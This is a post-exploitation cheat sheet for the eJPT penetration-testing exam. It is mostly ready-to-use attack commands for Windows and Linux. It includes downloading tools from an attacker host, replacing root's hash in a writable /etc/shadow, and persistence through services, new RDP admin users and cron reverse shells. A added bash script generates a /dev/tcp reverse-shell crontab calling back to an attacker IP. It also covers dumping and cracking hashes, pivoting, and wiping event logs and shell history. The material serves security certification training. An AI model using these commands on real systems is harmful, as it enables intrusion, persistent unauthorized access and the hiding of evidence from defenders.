10.Post-Exploitation.md


BPM Circuits

eJPT-CheatSheets
Bartosz Pokrywka

Useful info and commands for the eJPT cert exam

Windows Enumeration

Enumerating System Information

In meterpreter:

> getuid

> sysinfo

In shell:

> hostname

Command that enumerates most of the useful info in one go (OS version, build, hotfixes, domain, network cards):

> systeminfo

Enumerate installed hotfixes (patch level) in more detail than systeminfo gives; missing KBs are what you match against local privilege-escalation exploits later:

> wmic qfe get Caption,Description,HotFixID,InstalledOn

Sometimes there is a file containing the exact Windows edition at:

> C:\Windows\System32\eula.txt

Enumerating Users & Groups

In meterpreter:

> getuid

> getprivs

> run post/windows/gather/enum_logged_on_users

In shell:

> whoami

> whoami /priv

List currently logged on users:

> query user

Identify local users on the system:

> net users

To learn about a particular user (group membership, last logon, password policy):

> net user <USER>

Enumerate groups on system:

> net localgroup

Identify members of a group (check Administrators and Remote Desktop Users first):

> net localgroup <GROUP>

Enumerating Network Information

Windows IP Configuration:

> ipconfig

> ipconfig /all

Routing table:

> route print

Other hosts on the local network (ARP cache, useful for pivoting targets):

> arp -a

Open connections and listening ports, with the owning PID (match PIDs against tasklist):

> netstat -ano

Windows firewall configuration (the first command is the legacy syntax, still accepted on older hosts):

> netsh firewall show state

> netsh advfirewall show allprofiles

Enumerating Processes & Services

Meterpreter

Process list:

> ps

Search for process name:

> pgrep <processName>

Migrate to a specified process:

> migrate <processID>

Shell

List of started services:

> net start

Display all services:

> wmic service list brief

List of processes and the respective services:

> tasklist /SVC

List of scheduled tasks:

> schtasks /query /fo LIST /v

Automating Windows Local Enumeration

Metasploit (msfconsole)

Background the meterpreter session, then load a post module, point it at the session and run it:

> use post/windows/gather/win_privs

> use post/windows/gather/enum_logged_on_users

> use post/windows/gather/checkvm

> use post/windows/gather/enum_applications

> use post/windows/gather/enum_computers

> use post/windows/gather/enum_patches

> use post/windows/gather/enum_shares

> set SESSION <sessionID>

> run

JAWS

In shell, from the directory where jaws-enum.ps1 was uploaded (the output file is written next to it):

> powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt

Linux Enumeration

Enumerating System Information

Meterpreter

> sysinfo

Shell

Current dir:

> pwd

Host name:

> hostname

Distribution:

> cat /etc/issue

Name and release:

> cat /etc/*release

Kernel version:

> uname -r

Kernel version, architecture and build date (the kernel version is what you match against kernel exploits):

> uname -a

Environment variables:

> env

Hardware resources:

> lscpu

How much RAM is being consumed:

> free -h

Disk space:

> df -h

Block devices and partitions (look for mounted or unmounted disks):

> lsblk | grep sd

On Debian-based systems you can list installed packages (and their versions):

> dpkg -l

Enumerating Users & Groups

Meterpreter

Get the current user:

> getuid

Shell

Get username:

> whoami

Get group:

> groups <username>

Get other users on the system:

> cat /etc/passwd

Find only accounts with a real login shell (grep -v /nologin alone still shows /bin/false accounts, so exclude both):

> cat /etc/passwd | grep -v -e /nologin -e /false

To add a user to a specified group (needs root; this is a modification, not enumeration):

> usermod -aG <group> <user>

List currently logged on users:

> w

> who

> last

> lastlog
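Added example, not part of the original cheat sheet: a small script that does the /etc/passwd part of the user enumeration above properly. It reads the file through a function so it can be run against a constructed sample (below) or pointed at a real target's /etc/passwd, lists accounts whose shell is a real interactive shell, and flags any UID 0 account that is not root, which is a common backdoor indicator. The sample passwd content is constructed for this example.

```bash
#!/usr/bin/env bash
# Added example (not from the cheat sheet): parse an /etc/passwd-style file and
# report which accounts can actually log in, plus any UID-0 accounts other
# than root. Takes a file path so it can be tested on a constructed sample;
# point it at /etc/passwd on a real target.

# Constructed sample passwd content (assumption: not taken from any real host).
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/bin/false
alice:x:1000:1000:Alice:/home/alice:/bin/bash
toor:x:0:0:backdoor:/root:/bin/sh
bob:x:1001:1001:Bob:/home/bob:/bin/zsh'

# Print "user:uid:shell" for accounts whose shell (field 7) is a real
# interactive shell. Matching on the shell name instead of "grep -v nologin"
# also drops /bin/false and /bin/sync accounts.
login_users() {
    awk -F: '$7 ~ /\/(bash|sh|zsh|dash|ksh)$/ { print $1 ":" $3 ":" $7 }' "$1"
}

# Print accounts with UID 0 (field 3) that are not named root.
extra_root_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

demo() {
    tmp=$(mktemp)
    printf '%s\n' "$SAMPLE_PASSWD" > "$tmp"
    echo "[*] login-capable accounts (user:uid:shell):"
    login_users "$tmp"
    echo "[*] UID 0 accounts other than root:"
    extra_root_accounts "$tmp"
    rm -f "$tmp"
}
demo
```

On a real box replace the temp file with /etc/passwd (`login_users /etc/passwd`); no root is needed because /etc/passwd is world-readable.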

Enumerating Network Information

Meterpreter

Network config:

> ifconfig

Connection list:

> netstat

Network routes:

> route

ARP:

> arp

Shell

Network config:

> ip a s

Contents of the network names file (rarely populated, but cheap to check):

> cat /etc/networks

Hostname:

> cat /etc/hostname

Hosts file:

> cat /etc/hosts

Display DNS info:

> cat /etc/resolv.conf

Enumerating Processes & Services

Meterpreter

List of processes:

> ps

Look for PID number of process:

> pgrep <processName>

Migrate to desired process PID

> migrate <PID>

Shell:

List of processes:

> ps aux

> ps aux | grep <processName>

List of processes live view:

> top

List cron directories and jobs (system-wide jobs also live in /etc/cron.d and /etc/cron.{hourly,daily,weekly,monthly}):

> ls -al /etc/cron*

Show the system crontab (check for jobs run as root that call writable scripts):

> cat /etc/crontab

Automating Linux Local Enumeration

Metasploit (msfconsole, with the session backgrounded; set SESSION before running each module)

> use post/linux/gather/enum_configs

> use post/linux/gather/enum_network

> use post/linux/gather/enum_system

> use post/linux/gather/checkvm

LinEnum & linPEAS

  • LinEnum is a simple bash script that automates common Linux local enumeration checks in addition to identifying privilege escalation vulnerabilities.

  • GitHub Repo: https://github.com/rebootuser/LinEnum

I like linPEAS more; it is part of PEASS-ng, which also ships winPEAS for Windows:

  • GitHub Repo: https://github.com/carlospolop/PEASS-ng

Transferring Files

Setting up the web server on the attacker machine, in the directory holding the files to serve (python 2 and python 3 syntax respectively):

> python -m SimpleHTTPServer <port>

> python3 -m http.server <port>

Windows

>  certutil -urlcache -f http://<attackerIP>:<port>/file.exe file.exe

Linux

> wget http://<attackerIP>:<port>/file

Upgrading Shells

Check which shells are installed on the target:

> cat /etc/shells

> /bin/bash -i

If python is installed (gives a proper PTY, so sudo/su password prompts work):

> python -c 'import pty; pty.spawn("/bin/bash")'

If perl is installed:

> perl -e 'exec "/bin/bash";'

or, from inside an interactive perl session:

> exec "/bin/bash";

If ruby is installed, from inside an interactive ruby (irb) session:

> exec "/bin/bash"

Windows Privilege Escalation

Meterpreter

> getprivs

Then run the PrivescCheck script (https://github.com/itm4n/PrivescCheck) from a shell in the directory it was uploaded to:

> powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"

Linux Privilege Escalation

Weak Permissions

Enumerate files with weak (world-writable) permissions, ignoring symlinks and permission-denied noise:

> find / -not -type l -perm -o+w 2>/dev/null

If /etc/shadow turns up as writable, you can replace a user's password hash. Generate a new hash (md5crypt, salt "abc", password "password123"):

> openssl passwd -1 -salt abc password123

Now copy the hash and paste it into the second field of the user whose password you want to change (typically root); keep the other fields intact:

> nano/vim /etc/shadow
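Added example, not part of the original cheat sheet: the two steps of the weak-permissions path worked end to end against a scratch directory, so it can be run safely. The find wrapper prunes /proc, /sys and /dev (full of writable pseudo-files that are not useful), and the shadow edit is done with awk instead of by hand in nano/vim, which avoids the classic mistake of breaking the colon-separated fields. The shadow content is constructed sample data; if openssl is missing the script falls back to a placeholder hash (an assumption, not a real hash).

```bash
#!/usr/bin/env bash
# Added example (not from the cheat sheet): find world-writable files, then
# replace a user's hash in a shadow-format file. Run against a temp directory
# here; on a real target call find_world_writable / and point
# replace_shadow_hash at /etc/shadow (only works if it is writable).

# World-writable regular files and dirs under $1, skipping symlinks and the
# /proc, /sys and /dev pseudo-filesystems.
find_world_writable() {
    find "$1" \( -path /proc -o -path /sys -o -path /dev \) -prune -o \
         ! -type l -perm -o+w -print 2>/dev/null
}

# Replace the hash field (field 2) of USER in shadow-format FILE with NEWHASH.
# Shadow format: name:hash:lastchg:min:max:warn:inactive:expire:
replace_shadow_hash() {
    file=$1; user=$2; newhash=$3
    awk -F: -v OFS=: -v u="$user" -v h="$newhash" \
        '$1 == u { $2 = h } { print }' "$file" > "$file.tmp" \
      && mv "$file.tmp" "$file"
}

# Read back the hash field for USER (to confirm the edit took).
shadow_hash_of() {
    awk -F: -v u="$2" '$1 == u { print $2 }' "$1"
}

demo() {
    work=$(mktemp -d)
    # Constructed shadow file (assumption: sample data, not from a real host).
    # Single quotes matter: "$6$..." in double quotes would be expanded by bash.
    printf '%s\n' \
        'root:$6$saltsalt$zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz:19023:0:99999:7:::' \
        'alice:$6$abcdefgh$yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy:19023:0:99999:7:::' \
        > "$work/shadow"
    chmod 666 "$work/shadow"   # the misconfiguration this section is about

    echo "[*] world-writable files under $work:"
    find_world_writable "$work"

    # Same hash the cheat sheet generates: openssl passwd -1 -salt abc password123
    if command -v openssl >/dev/null 2>&1; then
        newhash=$(openssl passwd -1 -salt abc password123)
    else
        newhash='$1$abc$placeholderNoOpensslHere'   # assumption: openssl missing
    fi
    replace_shadow_hash "$work/shadow" root "$newhash"
    echo "[*] root hash is now: $(shadow_hash_of "$work/shadow" root)"
    rm -rf "$work"
}
demo
```

After replacing root's hash on a real target, `su root` with password123 should work; if it does not, check that the line still has nine colon-separated fields.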

SUDO Privileges

Find what commands the user can run with sudo (and whether NOPASSWD is set):

> sudo -l

Then look up the allowed binary for a known escape, e.g. on GTFOBins: https://gtfobins.github.io/

Persistence

Windows

Via Services

Metasploit (msfconsole), with the meterpreter session backgrounded:

> use exploit/windows/local/persistence_service

> set SESSION <sessionID>

> run

Via RDP

Meterpreter (enables RDP and adds a new local admin user):

> run getgui -e -u <username> -p <password>

Then on the attacker machine:

> xfreerdp /u:<username> /p:<password> /v:<targetIP>

Linux

SSH

Copy the target user's private key (~/.ssh/id_rsa) to the attacker machine; it logs you in as that user without a password:

> chmod 600 id_rsa

> ssh -i id_rsa <user>@<targetIP>

or:

Cronjobs

Check whether the cron service is running:

> ps -eaf | grep cron

If it is, write a crontab file with a reverse shell. The /dev/tcp one-liner is bash syntax, and cron runs jobs with /bin/sh, so wrap it in /bin/bash -c:

> echo "*/10 * * * * /bin/bash -c 'exec 196<>/dev/tcp/<attackerIP>/<port>; sh <&196 >&196 2>&196'" > cron

or with netcat (also a reverse shell; needs a nc build that supports -e):

> echo "*/10 * * * * nc <attackerIP> <port> -e /bin/sh" > cron

Install the file as the current user's crontab and verify:

> crontab cron

> crontab -l
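Added example, not part of the original cheat sheet: a script that builds the cron reverse-shell entry so that it actually fires. The `196<>/dev/tcp/...` redirection only exists in bash; cron executes jobs with /bin/sh (dash on Debian and Ubuntu), where the raw one-liner fails silently. The script wraps the command in `/bin/bash -c`, also sets `SHELL=/bin/bash` in the generated crontab, and checks whether the target's /bin/sh happens to be bash. The attacker IP and port are placeholders (assumption); the crontab is written to a file and not installed, so the script is safe to run anywhere.

```bash
#!/usr/bin/env bash
# Added example (not from the cheat sheet): generate a working cron reverse
# shell entry. Nothing is installed; install the result with: crontab <file>

# Emit one crontab line that calls back to $1:$2 every $3 minutes (default 10).
# The leading "0<&196;" from the classic one-liner is dropped: fd 196 is not
# open yet at that point, so it does nothing.
cron_reverse_shell_line() {
    ip=$1; port=$2; every=${3:-10}
    cmd="/bin/bash -c 'exec 196<>/dev/tcp/$ip/$port; sh <&196 >&196 2>&196'"
    printf '*/%s * * * * %s\n' "$every" "$cmd"
}

# cron uses /bin/sh unless the crontab sets SHELL=. Returns 0 if /bin/sh is
# actually bash (then /dev/tcp would work even without the wrapper).
sh_is_bash() {
    /bin/sh -c 'test -n "$BASH_VERSION"'
}

# Write a complete crontab file to $1 for callback host $2 port $3.
write_cron_file() {
    file=$1; ip=$2; port=$3
    {
        echo 'SHELL=/bin/bash'     # belt and braces: cron itself runs bash
        cron_reverse_shell_line "$ip" "$port" 10
    } > "$file"
}

demo() {
    # Placeholder attacker address (assumption).
    ip=10.10.14.5; port=4444
    if sh_is_bash; then
        echo "[*] /bin/sh is bash on this host; the wrapper is harmless anyway"
    else
        echo "[*] /bin/sh is not bash here; the raw /dev/tcp one-liner would fail under cron"
    fi
    f=$(mktemp)
    write_cron_file "$f" "$ip" "$port"
    echo "[*] generated crontab ($f):"
    cat "$f"
    rm -f "$f"
}
demo
```

Once installed with `crontab <file>`, start a listener on the attacker side (`nc -lvnp <port>`) and wait for the next 10-minute boundary; `crontab -l` confirms the entry, and `crontab -r` removes it when you clean up.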

Dumping & Cracking Hash

Windows

Use hashdump from the meterpreter session, or mimikatz.

In hashcat, for NTLM hashes use mode 1000.

hashdump prints user:RID:LM-hash:NT-hash:::; the NT hash is the fourth field (the LM part aad3b435... just means LM is disabled). In the example below the NT hash is that of an empty password:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

> echo "31d6cfe0d16ae931b73c59d7e0c089c0" > hash.txt

For dictionary attack:

> hashcat -a 0 -m 1000 hash.txt /path/to/dictionary.txt

Linux

Use hashdump from the meterpreter session, or look inside the /etc/shadow file (needs root).

The id between the first two dollar signs indicates the hashing algorithm: $1$ is md5crypt (hashcat mode 500), $5$ is sha256crypt (mode 7400), $6$ is sha512crypt (mode 1800). $y$ is yescrypt, the default on recent Debian/Ubuntu; hashcat has no mode for it, so use john with --format=crypt instead.

The next part is the SALT (also between dollar signs), followed by the hash itself.

Save only the hash field into a text file. Use single quotes: in double quotes bash would expand $y, $j9T and so on and silently mangle the hash:

> echo '$y$j9T$TANXgpk59y8r3jgPbDl/w/$UqiK6yahwqfyqhcegWLa1.z64TyePP5.VQpUnLqI3VD' > hash.txt

For a dictionary attack against a $6$ (sha512crypt) hash:

> hashcat -a 0 -m 1800 hash.txt /path/to/dictionary.txt

For a $y$ (yescrypt) hash:

> john --format=crypt --wordlist=/path/to/dictionary.txt hash.txt
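Added example, not part of the original cheat sheet, serving both the Windows and the Linux parts of this section: a script that pulls the crackable field out of hashdump and /etc/shadow lines and picks the hashcat mode from the crypt prefix, so the type mistake above (feeding a $y$ hash to -m 1800) is caught before wasting GPU time. The Windows line is the well-known empty-password NT hash; the Linux lines are constructed sample data (assumption), except the yescrypt one which is the hash shown on this page.

```bash
#!/usr/bin/env bash
# Added example (not from the cheat sheet): extract hashes from hashdump and
# shadow output and map crypt(3) prefixes to hashcat modes.

# hashdump format: user:RID:LM:NT:::  -> print the NT hash (4th field).
nt_hash_of() {
    printf '%s\n' "$1" | awk -F: '{ print $4 }'
}

# shadow format: user:$id$salt$hash:lastchg:...  -> print the crypt string.
crypt_field_of() {
    printf '%s\n' "$1" | awk -F: '{ print $2 }'
}

# Map a crypt(3) prefix to a hashcat mode. yescrypt ($y$) has no hashcat
# mode; john --format=crypt goes through the system libcrypt and handles it.
hashcat_mode_for() {
    case "$1" in
        \$1\$*)      echo 500 ;;     # md5crypt
        \$2[aby]\$*) echo 3200 ;;    # bcrypt
        \$5\$*)      echo 7400 ;;    # sha256crypt
        \$6\$*)      echo 1800 ;;    # sha512crypt
        \$y\$*)      echo "none (yescrypt: use john --format=crypt)" ;;
        *)           echo "unknown" ;;
    esac
}

# Write one hash per line to $1 from the remaining arguments.
write_hash_file() {
    out=$1; shift
    printf '%s\n' "$@" > "$out"
}

demo() {
    win='Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::'
    # Constructed shadow lines in single quotes so bash leaves the $ alone.
    lin1='alice:$6$abcdefgh$yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy:19023:0:99999:7:::'
    lin2='bob:$y$j9T$TANXgpk59y8r3jgPbDl/w/$UqiK6yahwqfyqhcegWLa1.z64TyePP5.VQpUnLqI3VD:19023:0:99999:7:::'

    echo "[*] NT hash for hashcat -m 1000: $(nt_hash_of "$win")"
    for l in "$lin1" "$lin2"; do
        h=$(crypt_field_of "$l")
        echo "[*] $h -> hashcat mode $(hashcat_mode_for "$h")"
    done
    f=$(mktemp)
    write_hash_file "$f" "$(nt_hash_of "$win")"
    echo "[*] wrote $(wc -l < "$f" | tr -d ' ') hash(es) to $f"
    rm -f "$f"
}
demo
```

Feed the resulting file to `hashcat -a 0 -m <mode> hash.txt wordlist` for the modes above, and to `john --format=crypt` for yescrypt.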

Pivoting

In the meterpreter session on the compromised host, add a route for the internal subnet so msfconsole modules can reach it through this session:

> run autoroute -s <subnet, for example 10.0.29.0/20>

Show active routing table:

> run autoroute -p

Put the meterpreter session in the background:

> background

Then scan the pivoted network with the Metasploit port scanner (nmap cannot use the meterpreter route directly):

> use auxiliary/scanner/portscan/tcp

> set RHOSTS <target IP or range in the pivoted network>

> run

Go back to the meterpreter session and forward a discovered port to a local port on the attacker machine:

> portfwd add -l 1234 -p 80 -r <targetIP in the pivoted network>

Then run an nmap service scan against the forwarded local port:

> nmap localhost -sV -p 1234

After that look for an exploit for the identified service.

Important: the pivoted host cannot connect back to the attacker machine, so set a bind payload, which listens on the target and is reached through the route:

> set payload windows/meterpreter/bind_tcp

Clearing Your Tracks

  • A good practice is to store all your scripts, exploits and binaries in the C:\Temp directory on Windows and the /tmp directory on Linux, so they are easy to find and delete when you are done.

Windows

Use a cleanup meterpreter resource (RC) file that removes the uploaded files and any persistence you added:

> resource <nameOfTheFile>

To clear the event logs in Windows use the meterpreter command (warning: it wipes the Application, System and Security logs entirely, which is itself noisy):

> clearev

Linux

Clear your tracks from the .bash_history file (edit out individual lines, then drop the current session's in-memory history so it is not written back on exit):

> nano/vim .bash_history

> history -c

To empty the whole .bash_history file:

> cat /dev/null > .bash_history